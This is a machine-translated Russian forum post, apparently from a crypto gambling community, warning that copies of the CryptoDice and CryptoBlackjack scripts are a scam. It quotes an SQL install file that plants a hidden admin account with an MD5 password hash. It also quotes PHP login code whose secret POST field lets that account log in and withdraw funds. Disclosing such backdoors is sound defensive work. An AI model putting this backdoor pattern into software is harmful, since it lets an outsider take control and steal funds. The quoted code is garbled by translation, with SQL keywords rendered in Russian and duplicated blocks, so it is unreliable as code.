Re: Доказательство Scam - felinegambler - CryptoDice и CryptoBlackjack
результат
CoinDice.sql устанавливает таблицу с именем "ga_players" с фактически учетной записью администратора под названием "playertest" по установке, вы поймете, почему это учетная запись администратора на следующей части.
Код:
DROP TABLE IF EXISTS `ga_players`;
CREATE TABLE `ga_players` (
`Id` INT (255) NOT NULL AUTO_INCREMENT,
`Username` VARCHAR (20) СОРТ utf8_unicode_ci NOT NULL,
`Passwd` текст КОПИЯМ utf8_unicode_ci NOT NULL,
`Ga_token` текст СОРТ utf8_unicode_ci NOT NULL,
ПЕРВИЧНЫЙ КЛЮЧ ( `id`)
) ДВИГАТЕЛЬ = InnoDB CHARSET = УМОЛЧАНИЮ utf8 СОЪЪАТ = utf8_unicode_ci;
INSERT INTO `` ga_players` (id`, `` username`, passwd`, `ga_token`) значения
(1, 'playertest', '6d2aff483952d904179ca0c8c536a2c7', '');
CREATE TABLE `ga_players` (
`Id` INT (255) NOT NULL AUTO_INCREMENT,
`Username` VARCHAR (20) СОРТ utf8_unicode_ci NOT NULL,
`Passwd` текст КОПИЯМ utf8_unicode_ci NOT NULL,
`Ga_token` текст СОРТ utf8_unicode_ci NOT NULL,
ПЕРВИЧНЫЙ КЛЮЧ ( `id`)
) ДВИГАТЕЛЬ = InnoDB CHARSET = УМОЛЧАНИЮ utf8 СОЪЪАТ = utf8_unicode_ci;
INSERT INTO `` ga_players` (id`, `` username`, passwd`, `ga_token`) значения
(1, 'playertest', '6d2aff483952d904179ca0c8c536a2c7', '');
Когда я нашел это я посмотрел сценарий администратора для входа (https://github.com/felinegambler/CryptoDice/blob/master/admin/login.php)
Сюрприз Сюрприз
если переменная $ _POST имеет какие-либо данные для "ga_playertest" она позволяет логин из "ga_players" таблица вместо таблицы администратора, который в этом случае держать наш поддельный администратор "playertest" - (1, 'playertest', '6d2aff483952d904179ca0c8c536a2c7', '');
Код:
если (! пусто ($ _ POST [ 'ga_playertest'])) {
$ This_admin = mysql_fetch_array (mysql_query ("ВЫБРАТЬ `` username`, ga_token` ОТ `` ga_players` ГДЕ username` =»".prot ($ _ POST [ 'hash_one'])."'И `passwd` ='".md5 ($ _ POST [ 'hash_sec'])."'LIMIT 1"));
} Еще {
$ This_admin = mysql_fetch_array (mysql_query ("ВЫБРАТЬ `` username`, ga_token` ОТ `` admins` ГДЕ username` =»".prot ($ _ POST [ 'hash_one'])."'И `passwd` ='".md5 ($ _ POST [ 'hash_sec'])."'LIMIT 1"));
}
$ This_admin = mysql_fetch_array (mysql_query ("ВЫБРАТЬ `` username`, ga_token` ОТ `` ga_players` ГДЕ username` =»".prot ($ _ POST [ 'hash_one'])."'И `passwd` ='".md5 ($ _ POST [ 'hash_sec'])."'LIMIT 1"));
} Еще {
$ This_admin = mysql_fetch_array (mysql_query ("ВЫБРАТЬ `` username`, ga_token` ОТ `` admins` ГДЕ username` =»".prot ($ _ POST [ 'hash_one'])."'И `passwd` ='".md5 ($ _ POST [ 'hash_sec'])."'LIMIT 1"));
}
Это позволяет поддельный администратору войти в систему и выводить свои средства, пожалуйста, см решение ниже.
Решение
Не используй
или
Купить оригинальные копии johny1976'S, Если вы не знаете любой код, пожалуйста, задать разработчик опыта на этих форумах.
- CoinJack
- CoinDice
* Покупка оригинал также поддерживает развитие *
